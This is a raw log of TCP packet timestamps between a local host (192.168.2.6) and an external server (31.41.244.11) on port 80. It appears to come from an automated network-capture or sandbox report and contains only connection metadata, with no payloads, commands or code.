                                                                                                                                                              Dec 18, 2024 11:47:28.092468977 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.094099045 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.094163895 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.094320059 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.096057892 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.096112013 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.096137047 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.097872972 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.097923994 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.097960949 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.098021030 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.099848032 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.099977016 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.100024939 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.101700068 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.101759911 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.101808071 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.103553057 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.103674889 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.103724957 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.105329037 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.105390072 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.105418921 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.106259108 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.107462883 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.107474089 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.107511997 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.107522964 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.108848095 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.109092951 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.109148979 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.110662937 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.110816002 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.110871077 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.112375021 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.112420082 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.112495899 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.114164114 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.114206076 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.114217043 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.114243984 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.115854979 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.115973949 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.116029978 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.117594957 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.117662907 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.117706060 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.117847919 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.119273901 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.119348049 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.119399071 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.121126890 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.121139050 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.121184111 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.122935057 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.122946024 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.122992992 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.124514103 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.124568939 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.124612093 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.124749899 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.126152992 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.126164913 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.126209021 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.127775908 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.127906084 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.127940893 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.127988100 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.129430056 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.129585981 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.129640102 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.131308079 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.131325960 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.131381035 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.132894039 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.133160114 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.133229971 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.134409904 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.134666920 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.134727955 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.136039019 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.136096954 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.136110067 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.136158943 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.137574911 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.137774944 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.137835979 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.137890100 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.139187098 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.139328957 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.139388084 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.139436007 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.140788078 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.140837908 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.140849113 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.140887976 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.142257929 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.142332077 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.142446995 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.142493010 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.143723011 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.144012928 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.144066095 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.145052910 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.145483971 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.145507097 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.145567894 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.146631956 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.146684885 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.146811962 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.146931887 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.148029089 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.148041964 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.148104906 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.149331093 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.149564981 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.149636984 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.150667906 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.150845051 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.150898933 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.152065992 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.152077913 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.152127981 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.153312922 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.153368950 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.153441906 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.154287100 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.154608965 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.154663086 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.154733896 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.154776096 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.155935049 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.155987024 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.156006098 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.156056881 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.157242060 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.157501936 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.157562971 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.158437967 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.158601999 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.158653975 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.159706116 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.159768105 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.159797907 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.160891056 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.160957098 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.161115885 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.162187099 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.162247896 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.162251949 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.162292004 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.163364887 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.163537979 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.163595915 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.165307045 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.165323973 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.165365934 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.165407896 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.165934086 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.165946007 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.165980101 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.165991068 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.166865110 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.166994095 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.167036057 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.168329000 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.168452024 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.168507099 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.169317007 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.169328928 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.169392109 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.169392109 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.170511961 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.170523882 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.170578003 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.171564102 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.171622038 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.171670914 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.172791958 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.172992945 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.173044920 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.174066067 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.174078941 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.174127102 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.174940109 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.174959898 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.175007105 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.175967932 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.175977945 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.176021099 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.177011967 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.177099943 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.177130938 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.177170992 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.178121090 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.178169012 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.178205013 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.178246975 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.179368019 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.179424047 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.179507017 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.179554939 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.180634022 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.180684090 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.180685997 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.180722952 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.182096004 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.182147980 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.182152987 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.182193995 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.182807922 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.182854891 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.182888031 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.182950020 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.183676958 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.183689117 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.183726072 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.184483051 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.184530020 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.184623957 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.184710979 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.185317039 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.185338020 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.185369015 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.185388088 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.186417103 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.186467886 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.186485052 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.186526060 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.288291931 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.288307905 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.288320065 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.288410902 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.288461924 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.288495064 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.288570881 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.288583040 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.288615942 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.288649082 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.289412975 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.289433002 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.289444923 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.289485931 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.289504051 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.290394068 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.290405989 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.290416002 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.290451050 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.290476084 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.291258097 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.291383982 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.291397095 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.291429996 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.291457891 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.292355061 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.292366982 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.292378902 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.292412043 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.292440891 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.293617964 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.293668032 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.293673992 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.293679953 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.293711901 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.293752909 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.294786930 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.294852018 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.294873953 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.294883966 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.294930935 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.296011925 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.296072006 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.296233892 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.296247005 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.296288967 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.296964884 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.296977043 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.296988010 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.297023058 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.297039032 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.297688961 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.297699928 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.297709942 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.297739029 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.297765970 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.298301935 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.298321962 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.298333883 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.298356056 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.298382998 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.299065113 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.299086094 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.299098015 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.299132109 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.299760103 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.299772024 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.299782991 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.299823046 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.299834013 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.300338984 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.300349951 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.300362110 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.300393105 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.300421000 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.300852060 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.300913095 CET804983731.41.244.11192.168.2.6
